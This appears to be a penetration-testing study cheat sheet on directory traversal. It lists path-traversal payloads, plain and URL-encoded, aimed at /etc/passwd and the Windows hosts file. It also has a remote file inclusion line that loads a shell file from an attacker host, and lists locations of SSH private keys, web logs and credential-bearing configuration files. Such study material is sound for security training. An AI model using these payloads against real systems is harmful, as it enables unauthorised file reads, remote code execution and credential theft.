// notes/ Web Exploitation
🕸️
Directory Traversal
1. View users on machine
#web applications#adot8
source · oscp.adot8.com · web-applications/directory-traversal ↗Directory Traversal
- View users on machine
- Search for SSH Keys
- Search for passwords in log or configuration files (.htaccess, config.php)
code
01../../../../../../../../../etc/passwd02../../../../../../../../../windows/system32/drivers/etc/hosts03..\..\..\..\..\..\..\..\..\windows\system32\drivers\etc\hostscode
01/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd02/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/windows/system32/drivers/etc/hosts03\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\windows\system32\drivers\etc\hostscode
01index.php?page=http://10.10.14.10/shell.txtPort knocking ; trigger ports to open from executing port knocking file
code
01/etc/knockd.confSSH
{% hint style="info" %} SSH keys are also stored under C:\Users\user\.ssh {% endhint %}
code
01id_rsa02id_ecdsa03id_ecdsa_sk04id_ed2551905id_ed25519_sk06id_dsacode
01authorized_keys02id_rsa.keystore03id_rsa.pub04known_hostsHTTPD, Apache2, Nginx
code
01/var/log/apache/access.log 02/var/log/apache2/access.log 03/var/log/apache/access_log 04/var/log/apache2/access_log05/var/log/access_log06/var/log/nginx/access.log 07/var/log/nginx/access_log 08/etc/httpd/logs/acces_log 09/etc/httpd/logs/error_log 10/var/www/logs/access_log 11/var/www/logs/access.log 12/usr/local/apache/logs/access. log 13/opt/apache2/logs/access_log14/opt/apache2/logs/access.log15/opt/apache/logs/access_log16/opt/apache/logs/access.logIIS
code
01C:\inetpub\logs\LogFiles\W3SVC1\02C:\inetpub\wwwroot\web.configLinux user specific
code
01.bash_history02.mysql_history03.my.cnfWindows
code
01c:\apache\php\php.ini 02c:\xampp\apache\bin\php.ini 03c:\xampp\apache\logs\access.log04c:\Program Files\Apache Group\Apache\conf\httpd.conf 05c:\Program Files\Apache Group\Apache2\conf\httpd.conf 06c:\Program Files\xampp\apache\conf\httpd.conf